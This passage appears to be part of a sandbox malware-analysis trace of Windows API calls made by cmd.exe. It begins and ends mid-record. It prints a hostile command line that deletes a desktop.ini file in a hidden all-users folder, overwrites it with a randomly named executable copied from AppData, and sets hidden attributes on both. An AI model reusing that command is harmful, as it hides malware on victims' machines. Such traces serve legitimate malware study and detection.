lpBuffer=0x30fc14*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.815] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0192.815] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0192.815] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.815] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0192.815] GetConsoleOutputCP () returned 0x1b5 [0192.815] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.816] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0192.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.816] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0192.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.816] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.816] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.816] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.816] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0192.816] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0192.816] GetEnvironmentStringsW () returned 0x4d04b0* [0192.817] FreeEnvironmentStringsW (penv=0x4d04b0) returned 1 [0192.817] GetEnvironmentStringsW () returned 0x4d04b0* [0192.817] FreeEnvironmentStringsW (penv=0x4d04b0) returned 1 [0192.817] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebb4 | out: phkResult=0x30ebb4*=0x40) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x60, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x1, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x1, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x0, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x40, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x40, lpcbData=0x30ebb8*=0x4) returned 0x0 
[0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x40, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegCloseKey (hKey=0x40) returned 0x0 [0192.817] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebb4 | out: phkResult=0x30ebb4*=0x40) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x40, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x1, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x1, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x0, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x9, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x4, lpData=0x30ebc0*=0x9, lpcbData=0x30ebb8*=0x4) returned 0x0 [0192.817] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x30ebbc, lpData=0x30ebc0, lpcbData=0x30ebb8*=0x1000 | out: lpType=0x30ebbc*=0x0, lpData=0x30ebc0*=0x9, lpcbData=0x30ebb8*=0x1000) returned 0x2 [0192.817] RegCloseKey (hKey=0x40) returned 0x0 [0192.817] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639a [0192.817] srand (_Seed=0x5b88639a) [0192.817] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"" [0192.818] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"" [0192.818] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.818] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d1c10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0192.818] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.818] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.818] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.818] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0192.818] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0192.818] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0192.818] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0192.818] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0192.818] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0192.818] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0192.818] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0192.818] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0192.818] GetEnvironmentStringsW () returned 0x4d2600* [0192.819] FreeEnvironmentStringsW (penv=0x4d2600) returned 1 [0192.819] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.819] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.819] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0192.819] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0192.819] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0192.819] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0192.819] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0192.819] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0192.819] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0192.819] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0192.819] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f980 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.819] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f980, lpFilePart=0x30f97c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f97c*="Desktop") returned 0x18 [0192.819] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.819] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f6fc | out: lpFindFileData=0x30f6fc) returned 0x4d0c90 [0192.819] FindClose (in: hFindFile=0x4d0c90 | out: hFindFile=0x4d0c90) returned 1 [0192.819] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f6fc | out: lpFindFileData=0x30f6fc) returned 0x4d0c90 [0192.819] FindClose (in: hFindFile=0x4d0c90 | out: hFindFile=0x4d0c90) returned 1 [0192.819] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f6fc | out: lpFindFileData=0x30f6fc) returned 0x4d0c90 [0192.820] FindClose (in: hFindFile=0x4d0c90 | out: hFindFile=0x4d0c90) returned 1 [0192.820] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.820] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0192.820] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0192.820] GetEnvironmentStringsW () returned 0x4d04b0* [0192.820] FreeEnvironmentStringsW (penv=0x4d04b0) returned 1 [0192.820] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.820] GetConsoleOutputCP () returned 0x1b5 [0192.820] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.820] GetUserDefaultLCID () returned 0x409 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x30fac0, cchData=128 | out: lpLCData="0") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fac0, cchData=128 | out: lpLCData="0") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fac0, cchData=128 | out: lpLCData="1") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0192.821] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0192.821] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0192.822] GetConsoleTitleW (in: lpConsoleTitle=0x4c0ad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.822] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.822] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0192.822] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0192.822] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0192.823] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0192.823] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0192.823] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0192.823] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0192.823] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0192.823] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0192.823] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0192.825] _wcsicmp (_String1="del", _String2=")") returned 59 [0192.825] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0192.825] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0192.825] _wcsicmp (_String1="IF", _String2="del") returned 5 [0192.825] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0192.825] _wcsicmp (_String1="REM", _String2="del") returned 14 [0192.825] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0192.827] _wcsicmp (_String1="type", _String2=")") returned 75 [0192.827] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0192.827] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0192.827] _wcsicmp (_String1="IF", _String2="type") returned -11 [0192.827] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0192.827] _wcsicmp (_String1="REM", _String2="type") returned -2 [0192.827] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0192.832] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.832] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0192.837] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.837] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0xffffffff [0192.838] GetLastError () returned 0x2 [0192.838] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0xffffffff [0192.838] GetLastError () returned 0x2 [0192.838] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0x4d2560 [0192.838] FindClose (in: hFindFile=0x4d2560 | out: hFindFile=0x4d2560) returned 1 [0192.838] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0xffffffff [0192.838] GetLastError () returned 0x2 [0192.838] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0x4d2560 [0192.838] FindClose (in: hFindFile=0x4d2560 | out: hFindFile=0x4d2560) returned 1 [0192.838] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0192.838] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0192.838] GetConsoleTitleW (in: lpConsoleTitle=0x30f4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.919] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f370, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f438 | out: lpAttributeList=0x30f370, lpSize=0x30f438) returned 1 
[0192.919] UpdateProcThreadAttribute (in: lpAttributeList=0x30f370, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f430, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f370, lpPreviousValue=0x0) returned 1 [0192.919] GetStartupInfoW (in: lpStartupInfo=0x30f32c | out: lpStartupInfo=0x30f32c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0192.919] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0192.920] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f3cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f418 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" ", lpProcessInformation=0x30f418*(hProcess=0x50, hThread=0x4c, dwProcessId=0xea0, dwThreadId=0xe38)) returned 1 [0192.970] CloseHandle (hObject=0x4c) returned 1 [0192.970] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0192.970] GetEnvironmentStringsW () returned 0x4d09e0* [0192.970] FreeEnvironmentStringsW (penv=0x4d09e0) returned 1 [0192.970] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) 
returned 0x0 [0193.063] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f30c | out: lpExitCode=0x30f30c*=0x0) returned 1 [0193.063] CloseHandle (hObject=0x50) returned 1 [0193.063] _vsnwprintf (in: _Buffer=0x30f454, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f318 | out: _Buffer="00000000") returned 8 [0193.063] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0193.063] GetEnvironmentStringsW () returned 0x4d25b0* [0193.063] FreeEnvironmentStringsW (penv=0x4d25b0) returned 1 [0193.063] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.063] GetEnvironmentStringsW () returned 0x4d25b0* [0193.063] FreeEnvironmentStringsW (penv=0x4d25b0) returned 1 [0193.063] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f370 | out: lpAttributeList=0x30f370) [0193.063] GetConsoleTitleW (in: lpConsoleTitle=0x30f6f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.064] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x30e768, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x30e76c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x30e768*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0193.064] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0193.064] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0193.064] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0193.064] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\desktop.ini")) returned 0xffffffff [0193.064] GetLastError () returned 0x2 [0193.064] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1")) returned 0x2010 [0193.064] _wcsicmp 
(_String1="desktop.ini", _String2=".") returned 54 [0193.064] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0193.064] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\desktop.ini")) returned 0xffffffff [0193.064] GetLastError () returned 0x2 [0193.065] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x4d363c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d363c) returned 0xffffffff [0193.065] GetLastError () returned 0x2 [0193.065] _get_osfhandle (_FileHandle=2) returned 0xb [0193.065] GetFileType (hFile=0xb) returned 0x2 [0193.065] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0193.065] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30f168 | out: lpMode=0x30f168) returned 1 [0193.065] _get_osfhandle (_FileHandle=2) returned 0xb [0193.065] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x30f19c | out: lpConsoleScreenBufferInfo=0x30f19c) returned 1 [0193.065] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0193.066] GetFileType (hFile=0x7) returned 0x2 [0193.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.066] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f88c | out: lpMode=0x30f88c) returned 1 [0193.066] _dup (_FileHandle=1) returned 3 [0193.066] _close (_FileHandle=1) returned 0 [0193.067] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini", _String2="con") returned -53 [0193.067] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f85c, dwCreationDisposition=0x2, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0193.067] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0193.067] GetConsoleTitleW (in: lpConsoleTitle=0x30f68c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.067] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x30f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f1f0) returned 0x4d0830 [0193.067] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0193.067] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0193.067] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0193.068] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.069] _get_osfhandle (_FileHandle=1) 